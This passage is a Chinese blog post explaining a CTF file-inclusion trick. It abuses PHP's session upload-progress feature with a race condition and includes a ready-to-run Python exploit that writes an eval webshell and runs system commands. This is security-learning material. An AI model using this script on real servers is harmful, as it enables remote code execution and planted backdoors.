浅谈PHP_SESSION_UPLOAD_PROGRESS和条件竞争的巧妙利用

最新推荐文章于 2022-12-11 21:53:01 发布
最新推荐文章于 2022-12-11 21:53:01 发布
阅读量910 收藏 1
点赞数 1
分类专栏: web安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52737372/article/details/117789229
版权

前些阵子CISCN中出了一道web的文件包含题目,即使非常简单,然鹅也败给了

PHP_SESSION_UPLOAD_PROGRESS

在php5.4.0后提供了一个用于检测上传进度的功能,这个功能会在文件上传的时候发送一个post请求来检查状态,对文件上传本身并没有什么作用,但是我们缺可以利用这个功能进行一些操作
在这里插入图片描述如果在post请求中插入一句话木马让服务器生成一个/tmp/sess/文件我们就可以利用因此如果我们能够确定
session.upload_progress.enabled = On
存储Session的路径
我们就可以定义自己的SESSION ID
但还有另一个困难session.upload_progress.cleanup往往是开启的,他会在读取post信息后清除进度,但我们也可以利用条件竞争来解决

附赠大佬脚本

import io
import sys
import requests
import threading

sessid = 'Qftm'

def POST(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            'http://XXXXXXX',
            data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php system('cat *');fputs(fopen('shell.php','w'),'<?php @eval($_POST[mtfQ])?>');?>"},
            files={"file":('q.txt', f)},
            cookies={'PHPSESSID':sessid}
        )

def READ(session):
    while True:
        response = session.get(f'http://XXXXXXX?file=/tmp/sess_{sessid}')
        if 'flag' not in response.text:
            print('[+++]retry')
        else:
            print(response.text)
            sys.exit(0)


with requests.session() as session:
    t1 = threading.Thread(target=POST, args=(session, ))
    t1.daemon = True
    t1.start()

    READ(session)
~(~ ̄▽ ̄)~~
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
PHP基于session.upload_progress 实现文件上传进度显示功能详解
10-16
主要介绍了PHP基于session.upload_progress 实现文件上传进度显示功能,结合实例形式分析了php5.4版本session.upload_progress特性实现文件上传进度显示的相关操作技巧,需要的朋友可以参考下
利用PHP_SESSION_UPLOAD_PROGRESS上传webshell
god_Zeo的安全博客
09-24 754
0x01 环境配置&利用条件 环境分析 session.use_strict_mode默认值为0,此时用户是可以自己定义Session ID的 我们在Cookie里设置PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag session.upload_progress.prefix由我们构造的session.upload_progress.name值组成,最后被写入sess_文件里。 所以: 这个文件名是PHPSESSID=flag,文件名
php通过session实现upload_progress
prape's world!
01-07 1144
php中,显示上传文件进度有swf,apc,纯javascript等集中方法,而现在比较推荐的是利用phpsessionPHP>5.4)实现,这里,我简单的记录一下。 相关资料可以参考php.net/manual/en/session.upload-progress.php,还是相对比较简单的,可以参考www.111cn.net/phper/php-cy/54314.htm这里的讲解,但是
php-session文件包含和反序列化(对session.upload_progress利用)
unexpectedthing的博客
02-11 1594
文章目录前言session的简介PHPsession的存储方式php.ini中的一些配置php中的session.upload_progress文件包含反序列化$_SESSION变量直接可控$_SESSION变量不可控参考链接 前言 本文是利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含和反序列化的总结。 也就是关于php-session的文件包含和反序列化 session的简介 session被称为“会话控制”,Session 对象存储特定用户会话所需的属性及配置信息。这样,当用
PHP中的Session Upload Progress 设置问题
超人学飞的日子
07-06 1897
在写CTF题目的时候遇到了session反序列化的漏洞,需要通过Session Upload Progress来写入seession的值。在本地测试时遇到了些问题:fool1.php:&lt;?phpini_set('session.serialize_handler', 'php_serialize');session_start();//$_SESSION['ryat'] = $_GET['r...
php_users_admin_session.rar_admin session_php 用户管理
09-24
上面是用PHP写的多用户管理的代码,MYSQL数据库也有的,里面有SQL文件
php $_SESSION会员登录实例分享
10-22
主要为大家详细介绍了php $_SESSION会员登录实例,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
php session_decode函数用法讲解
10-16
在本篇文章里小编给大家整理了关于php session_decode函数怎么用的相关知识点以及实例内容,需要的朋友们学习下。
文件包含(session条件竞争
qq_64318364的博客
12-04 545
session条件竞争,简单复现
记一次PHP_SESSION_UPLOAD_PROGRESS的本地文件包含
末初的CSDN博客
05-07 913
来源于今天一位朋友给的题目,叫我帮忙看看 题目名字是有提示LFI,这个登录框测试了一下发现输入什么都是返回一样,也没有有注入的迹象,url很明显可能存在LFI,尝试下读取logo.php /?page=php://filter/convert.base64-encode/resource=login.php 有过滤,简单fuzz了下发现过滤了如下 base、file、http、ftp、phar、gopher、data、zip、read、rot、string、decode、flag、..... 但.
Web -- 变量覆盖 + php弱类型 + 条件竞争
正在学习的路上...
11-10 274
变量覆盖 + php弱类型 + 条件竞争   第一步构造id 进入 随意写,提交,下载下来,,说太满, 使用Brup Intruder模块,开两个任务,一个上传,一个访问 。 上传: ,,攻击100次。 访问 ,之后和上传步骤一样, 最后先点击上传的Start attack ,然后在点击访问的Start attack。 结果: ,有可能访问那个页面也就是第二张...
php条件竞争漏洞,代码审计--12--竞争条件漏洞
weixin_30650955的博客
03-20 266
1、漏洞描述漏洞描述:Web 应用程序可以同时处理很多HTTP 请求。开发人员经常在不考虑线程安全的情况下使用变量。从而导致对有些共享资源进行混乱操作,整个业务处理流程改变。在java中比较容易出现条件竞争的问题,很多Servlet开发者常常会忽视一些问题,那就是Servlet实际上是一个单件,除非Servlet实现SingleThreadModel接口。当多线程访问时(即多个用户一起访问时),每...
session.upload_progress.enabled开启的问题
weixin_30539835的博客
06-26 545
exp.php的内容,存在文件包含 <?php include($_GET['lfi']); $key = ini_get("session.upload_progress.prefix") . $_POST[ini_get("session.upload_progress.name")]; var_dump($_SESSION); var_dump($key...
文件包含和反序列化渗透——session.upload_progress利用 演示讲解
weixin_48083470的博客
08-06 525
利用session.upload_progress进行文件包含和反序列化渗透 session.upload_progress php中和这个功能相关的有四个配置 session.upload_progress.enabled = on //功能是否开启 session.upload_progress.cleanup = on //清空是否开启 session.upload_progress.prefix = “upload_progress_” // session.upload_progress
session条件竞争
qq_62046696的博客
12-11 505
PHP SESSION 的存储Session会话存储方式PHPsession以文件的形式存储服务器的文件中,session.save_path来控制默认路径session文件默认是/var/lib/php/sessions目录下,文件名是sess_加上sessionID字段但是在赛题中大多数都是/tmp目录下,需要php.ini力sesion.auto_start设置为1,然后修改目录:如果开启这个选项,则PHP在接收请求的时候会,不再需要执行session_start()。
EasyCleanup(session文件包含&条件竞争
qq_52907838的博客
09-26 970
打开就是原码 <?php if(!isset($_GET['mode'])){ highlight_file(__file__); }else if($_GET['mode'] == "eval"){ $shell = $_GET['shell'] ?? 'phpinfo();'; if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker"); eval($shell...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8190
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
ChatGPT4.0知识问答、DALL-E生成AI图片、Code Copilot辅助编程,打开新世界的大门.txt
最新发布
04-30
ChatGPT4.0知识问答、DALL-E生成AI图片、Code Copilot辅助编程,打开新世界的大门
php $_session
09-20
在引用的演示代码中,test1.php文件首先使用session_start()函数开启了一个会话,并将两个会员变量$_SESSION['name']="admin"和$_SESSION['password']=123456存储在$_SESSION数组中。然后,通过使用$_SESSION['name'...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值